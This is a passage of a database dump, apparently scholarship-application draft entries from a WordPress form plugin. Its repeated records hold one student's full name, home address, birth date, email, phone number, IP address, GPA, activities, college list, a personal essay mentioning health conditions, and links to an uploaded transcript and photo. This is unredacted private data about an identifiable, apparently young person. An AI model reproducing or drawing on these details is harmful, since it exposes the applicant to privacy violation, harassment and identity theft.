Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med \",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\\r\\n\\r\\n\\r\\n\\r\\n\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\\r\\n\",\"36\":\"\\r\\n\",\"37\":\"University of Southern California \\r\\nScripps College\\r\\nUniversity of North Carolina \\r\\nUniversity of Maryland College Park\\r\\nSpelman College\",\"38\":\"\",\"39\":\"\",\"40\":\"As Executive Vice President in FBLA to a Delta Scholar to VP of Supply Chain of Junior Achievement Rising Women, representation and inclusion have defined my high school experiences. I have always claimed the title of the \\u201conly black girl,\\u201d in all my activities: my classroom, girl scout troop, bible study. At first, I dismissed the title because it was all I knew. As I grew older, \\u201conly black girl\\u201d became my anchor for self-confidence, growth, and faith. \\r\\nI observed the lack of representation and its subsequent effect. For me, growing older also meant an influx of hair and skin issues ranging from alopecia to severe acne. The absence of diversity in the dermatology field made it difficult for me to find solutions that would work for my ethnic skin and hair. However, the moment I was seen by a dermatologist who looked like me, an African American woman, she knew immediately what to do. This significant moment inspired me to initiate change and become a dermatologist myself. \\r\\n\\u201cOnly black girl\\u201d is now a label that no longer anchors me, but motivates me to be a part of representation, participating in programs that will affect change. This past summer, I spent three weeks at the University of Pennsylvania Wharton School through the LEAD program. I learned how identities influence consumers decisions from Ester Uduehi, President of the Wharton Society for the Advancement of Women in Business Academia. While visiting Fortune 500 companies such as American Express, Morgan Stanley, and Lion Brothers, I learned about corporate dynamics and responsibilities. Later, interning at a dermatology practice, I had the opportunity to shadow my mentor and also assist in various procedures such as laser treatments, alopecia treatments (cortisone shots, platelet rich plasma treatments), and mole removals. I was also exposed to effective management of a medical practice by my mentor, a woman of color, while conducting research discovering the relationship between curl patterns and hair loss. (https:\\/\\/therbcpa.weebly.com\\/ ) \\r\\nA college education is necessary in order for me the knowledge I need to pursue my dream as a physician entrepreneur. At university, I aspire to major in business while being on a pre-med track during my undergraduate training and to participate in a MD\\/MBA program to pursue my dream as a physician entrepreneur. Growing up in a family of physicians, I have witnessed an increasing need for doctors to possess an extensive knowledge of business and a discernment of the healthcare industry. \\r\\nThis path requires many years of education including undergraduate, medical school, and residency; due to doing both business and medicine, I will most likely have to do another year of undergraduate as well. This adds up to approximately 13-14 years of education and the cost of the journey adds up to about $600,000; a very expensive endeavor. However, no matter the cost, this education is necessary in order for me to become an agent of change in the dermatology field; to be the person who people of color look to for aid. \\r\\n \\r\\n\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Ireheadpic.pdf\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e816a356b7e7\"}'),('b58eb1aa88024f08bb7f16bb102b99fc',NULL,6,'2020-03-30 03:42:30','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\"},\"19\":{\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"8\":\"\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med\",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\",\"36\":\"\",\"37\":\"University of Southern California \\r\\nScripps College\\r\\nUniversity of North Carolina \\r\\nUniversity of Maryland College Park\\r\\nSpelman College\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"As Executive Vice President in FBLA to a Delta Scholar to VP of Supply Chain of Junior Achievement Rising Women, representation and inclusion have defined my high school experiences. I have always claimed the title of the \\u201conly black girl,\\u201d in all my activities: my classroom, girl scout troop, bible study. At first, I dismissed the title because it was all I knew. As I grew older, \\u201conly black girl\\u201d became my anchor for self-confidence, growth, and faith. \\r\\nI observed the lack of representation and its subsequent effect. For me, growing older also meant an influx of hair and skin issues ranging from alopecia to severe acne. The absence of diversity in the dermatology field made it difficult for me to find solutions that would work for my ethnic skin and hair. However, the moment I was seen by a dermatologist who looked like me, an African American woman, she knew immediately what to do. This significant moment inspired me to initiate change and become a dermatologist myself. \\r\\n\\u201cOnly black girl\\u201d is now a label that no longer anchors me, but motivates me to be a part of representation, participating in programs that will affect change. This past summer, I spent three weeks at the University of Pennsylvania Wharton School through the LEAD program. I learned how identities influence consumers decisions from Ester Uduehi, President of the Wharton Society for the Advancement of Women in Business Academia. While visiting Fortune 500 companies such as American Express, Morgan Stanley, and Lion Brothers, I learned about corporate dynamics and responsibilities. Later, interning at a dermatology practice, I had the opportunity to shadow my mentor and also assist in various procedures such as laser treatments, alopecia treatments (cortisone shots, platelet rich plasma treatments), and mole removals. I was also exposed to effective management of a medical practice by my mentor, a woman of color, while conducting research discovering the relationship between curl patterns and hair loss. (https:\\/\\/therbcpa.weebly.com\\/ ) \\r\\nA college education is necessary in order for me the knowledge I need to pursue my dream as a physician entrepreneur. At university, I aspire to major in business while being on a pre-med track during my undergraduate training and to participate in a MD\\/MBA program to pursue my dream as a physician entrepreneur. Growing up in a family of physicians, I have witnessed an increasing need for doctors to possess an extensive knowledge of business and a discernment of the healthcare industry. \\r\\nThis path requires many years of education including undergraduate, medical school, and residency; due to doing both business and medicine, I will most likely have to do another year of undergraduate as well. This adds up to approximately 13-14 years of education and the cost of the journey adds up to about $600,000; a very expensive endeavor. However, no matter the cost, this education is necessary in order for me to become an agent of change in the dermatology field; to be the person who people of color look to for aid.\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\",\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med \",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\\r\\n\\r\\n\\r\\n\\r\\n\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\\r\\n\",\"36\":\"\",\"37\":\"University of Southern California \\r\\nScripps College\\r\\nUniversity of North Carolina \\r\\nUniversity of Maryland College Park\\r\\nSpelman College\",\"38\":\"\",\"39\":\"\",\"40\":\"As Executive Vice President in FBLA to a Delta Scholar to VP of Supply Chain of Junior Achievement Rising Women, representation and inclusion have defined my high school experiences. I have always claimed the title of the \\u201conly black girl,\\u201d in all my activities: my classroom, girl scout troop, bible study. At first, I dismissed the title because it was all I knew. As I grew older, \\u201conly black girl\\u201d became my anchor for self-confidence, growth, and faith. \\r\\nI observed the lack of representation and its subsequent effect. For me, growing older also meant an influx of hair and skin issues ranging from alopecia to severe acne. The absence of diversity in the dermatology field made it difficult for me to find solutions that would work for my ethnic skin and hair. However, the moment I was seen by a dermatologist who looked like me, an African American woman, she knew immediately what to do. This significant moment inspired me to initiate change and become a dermatologist myself. \\r\\n\\u201cOnly black girl\\u201d is now a label that no longer anchors me, but motivates me to be a part of representation, participating in programs that will affect change. This past summer, I spent three weeks at the University of Pennsylvania Wharton School through the LEAD program. I learned how identities influence consumers decisions from Ester Uduehi, President of the Wharton Society for the Advancement of Women in Business Academia. While visiting Fortune 500 companies such as American Express, Morgan Stanley, and Lion Brothers, I learned about corporate dynamics and responsibilities. Later, interning at a dermatology practice, I had the opportunity to shadow my mentor and also assist in various procedures such as laser treatments, alopecia treatments (cortisone shots, platelet rich plasma treatments), and mole removals. I was also exposed to effective management of a medical practice by my mentor, a woman of color, while conducting research discovering the relationship between curl patterns and hair loss. (https:\\/\\/therbcpa.weebly.com\\/ ) \\r\\nA college education is necessary in order for me the knowledge I need to pursue my dream as a physician entrepreneur. At university, I aspire to major in business while being on a pre-med track during my undergraduate training and to participate in a MD\\/MBA program to pursue my dream as a physician entrepreneur. Growing up in a family of physicians, I have witnessed an increasing need for doctors to possess an extensive knowledge of business and a discernment of the healthcare industry. \\r\\nThis path requires many years of education including undergraduate, medical school, and residency; due to doing both business and medicine, I will most likely have to do another year of undergraduate as well. This adds up to approximately 13-14 years of education and the cost of the journey adds up to about $600,000; a very expensive endeavor. However, no matter the cost, this education is necessary in order for me to become an agent of change in the dermatology field; to be the person who people of color look to for aid. \\r\\n \\r\\n\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Ireheadpic.pdf\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e816aa64b281\"}'),('305bcb7e5b7d46009396239783b142aa',NULL,6,'2020-03-30 03:43:01','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\"},\"19\":{\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"8\":\"\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med\",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\",\"36\":\"Wazobia Starz Youth Dance Group \\r\\nChoreographer and Mentor                          [September 2016 - Present]\\r\\nMotivating and mentoring girls ages 5-13 years old through teaching dance as a way to connect with their Nigerian culture\",\"37\":\"University of Southern California \\r\\nScripps College\\r\\nUniversity of North Carolina \\r\\nUniversity of Maryland College Park\\r\\nSpelman College\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"As Executive Vice President in FBLA to a Delta Scholar to VP of Supply Chain of Junior Achievement Rising Women, representation and inclusion have defined my high school experiences. I have always claimed the title of the \\u201conly black girl,\\u201d in all my activities: my classroom, girl scout troop, bible study. At first, I dismissed the title because it was all I knew. As I grew older, \\u201conly black girl\\u201d became my anchor for self-confidence, growth, and faith. \\r\\nI observed the lack of representation and its subsequent effect. For me, growing older also meant an influx of hair and skin issues ranging from alopecia to severe acne. The absence of diversity in the dermatology field made it difficult for me to find solutions that would work for my ethnic skin and hair. However, the moment I was seen by a dermatologist who looked like me, an African American woman, she knew immediately what to do. This significant moment inspired me to initiate change and become a dermatologist myself. \\r\\n\\u201cOnly black girl\\u201d is now a label that no longer anchors me, but motivates me to be a part of representation, participating in programs that will affect change. This past summer, I spent three weeks at the University of Pennsylvania Wharton School through the LEAD program. I learned how identities influence consumers decisions from Ester Uduehi, President of the Wharton Society for the Advancement of Women in Business Academia. While visiting Fortune 500 companies such as American Express, Morgan Stanley, and Lion Brothers, I learned about corporate dynamics and responsibilities. Later, interning at a dermatology practice, I had the opportunity to shadow my mentor and also assist in various procedures such as laser treatments, alopecia treatments (cortisone shots, platelet rich plasma treatments), and mole removals. I was also exposed to effective management of a medical practice by my mentor, a woman of color, while conducting research discovering the relationship between curl patterns and hair loss. (https:\\/\\/therbcpa.weebly.com\\/ ) \\r\\nA college education is necessary in order for me the knowledge I need to pursue my dream as a physician entrepreneur. At university, I aspire to major in business while being on a pre-med track during my undergraduate training and to participate in a MD\\/MBA program to pursue my dream as a physician entrepreneur. Growing up in a family of physicians, I have witnessed an increasing need for doctors to possess an extensive knowledge of business and a discernment of the healthcare industry. \\r\\nThis path requires many years of education including undergraduate, medical school, and residency; due to doing both business and medicine, I will most likely have to do another year of undergraduate as well. This adds up to approximately 13-14 years of education and the cost of the journey adds up to about $600,000; a very expensive endeavor. However, no matter the cost, this education is necessary in order for me to become an agent of change in the dermatology field; to be the person who people of color look to for aid.\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\",\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med \",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  \\r\\n Executive Vice President   June 2019- Present\\r\\n Officer at Large                      June 2018 - June 2019\\r\\n General Member                    September 2016 - June 2018 \\r\\n\\r\\n-River Hill POMS  \\r\\nTeam Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n\\r\\n-Black Leadership Union \\r\\nPresident  September 2019 - Present\\r\\nHistorian   September 2018 - June 2019\\r\\nGeneral Member September 2016- June 2018\\r\\n\\r\\n-National Honor Society \\r\\nMember November 2018 - Present\\r\\n\\r\\n-Delta Scholars \\r\\nVice President  September 2019 - Present\\r\\n BLU Liaison         September 2018- June 2019\\r\\n General Member September 2017- June 2018\\r\\n\\r\\n-Class of 2020 Student Government Association \\r\\nVice President  June 2017- Present\\r\\n\\r\\n-Leadership, Education, and Development (LEAD) Program \\r\\n Participant                            July 2019\\r\\nSelected to attend the program at the Wharton School at the University of Pennsylvania out of hundreds of applicants\\r\\nStrengthened and developed communication skills within a diverse group of students \\r\\n\\r\\n-Kindred Hair and Skin Center \\r\\n Internship\\t\\t\\t  September 2018 - Present\\r\\nShadow board certified dermatologist  in appointments and various dermatology procedures\\r\\nOrganize and complete paperwork \\r\\n\\r\\n-Maryland Leadership Workshop \\r\\nAdvanced Leadership Workshop, University of Maryland, Baltimore County \\t                                   July 2018\\r\\nSenior High Camp, Washington College\\t\\t\\t\\t\\t                                   July 2017\\r\\nNetworked and partnered with students across Maryland to analyze real life scenarios\\/problems and develop probable solutions\\r\\n\\r\\n-Junior Achievement Rising Woman \\r\\nVP of Supply Chain\\t            September 2017 - January 2018\\r\\nWorked as part of a team to build a company and product\\r\\nServed as team supply chain lead to create and source materials and negotiate prices with various suppliers\\r\\n\\r\\n\\r\\n\\r\\n\",\"13\":\"Senior Dance Company Outstanding Achievement Award                    [ June 2017, June 2018, June 2019]\\r\\nMid Atlantic Poms & Dance Association State Championship|1st place Team  [March 2017, March 2019]\\r\\nFuture Business Leaders of America State Conference|4th place Business Plan\\/Presentation     [March 2019]\\r\\nDistributive Education Clubs of America State Conference|2nd place Role Play                [February 2019]\\r\\nAcademic Achievement Award| English Honors, Biology GT                                       [ June 2017, June 2018]\\r\\nFuture Business Leaders of America State Conference|2nd place Presentation                       [ March  2018]\\r\\nFuture Business Leaders of America Regional Conference|1st place Presentation                [ January 2018]\\r\\n\",\"36\":\"Wazobia Starz Youth Dance Group \\r\\nChoreographer and Mentor                          [September 2016 - Present]\\r\\nMotivating and mentoring girls ages 5-13 years old through teaching dance as a way to connect with their Nigerian culture\",\"37\":\"University of Southern California \\r\\nScripps College\\r\\nUniversity of North Carolina \\r\\nUniversity of Maryland College Park\\r\\nSpelman College\",\"38\":\"\",\"39\":\"\",\"40\":\"As Executive Vice President in FBLA to a Delta Scholar to VP of Supply Chain of Junior Achievement Rising Women, representation and inclusion have defined my high school experiences. I have always claimed the title of the \\u201conly black girl,\\u201d in all my activities: my classroom, girl scout troop, bible study. At first, I dismissed the title because it was all I knew. As I grew older, \\u201conly black girl\\u201d became my anchor for self-confidence, growth, and faith. \\r\\nI observed the lack of representation and its subsequent effect. For me, growing older also meant an influx of hair and skin issues ranging from alopecia to severe acne. The absence of diversity in the dermatology field made it difficult for me to find solutions that would work for my ethnic skin and hair. However, the moment I was seen by a dermatologist who looked like me, an African American woman, she knew immediately what to do. This significant moment inspired me to initiate change and become a dermatologist myself. \\r\\n\\u201cOnly black girl\\u201d is now a label that no longer anchors me, but motivates me to be a part of representation, participating in programs that will affect change. This past summer, I spent three weeks at the University of Pennsylvania Wharton School through the LEAD program. I learned how identities influence consumers decisions from Ester Uduehi, President of the Wharton Society for the Advancement of Women in Business Academia. While visiting Fortune 500 companies such as American Express, Morgan Stanley, and Lion Brothers, I learned about corporate dynamics and responsibilities. Later, interning at a dermatology practice, I had the opportunity to shadow my mentor and also assist in various procedures such as laser treatments, alopecia treatments (cortisone shots, platelet rich plasma treatments), and mole removals. I was also exposed to effective management of a medical practice by my mentor, a woman of color, while conducting research discovering the relationship between curl patterns and hair loss. (https:\\/\\/therbcpa.weebly.com\\/ ) \\r\\nA college education is necessary in order for me the knowledge I need to pursue my dream as a physician entrepreneur. At university, I aspire to major in business while being on a pre-med track during my undergraduate training and to participate in a MD\\/MBA program to pursue my dream as a physician entrepreneur. Growing up in a family of physicians, I have witnessed an increasing need for doctors to possess an extensive knowledge of business and a discernment of the healthcare industry. \\r\\nThis path requires many years of education including undergraduate, medical school, and residency; due to doing both business and medicine, I will most likely have to do another year of undergraduate as well. This adds up to approximately 13-14 years of education and the cost of the journey adds up to about $600,000; a very expensive endeavor. However, no matter the cost, this education is necessary in order for me to become an agent of change in the dermatology field; to be the person who people of color look to for aid. \\r\\n \\r\\n\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Ireheadpic.pdf\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e816ac5b79e3\"}'),('1300d6d74ec34cd6ab2aaa757156c158',NULL,6,'2020-03-30 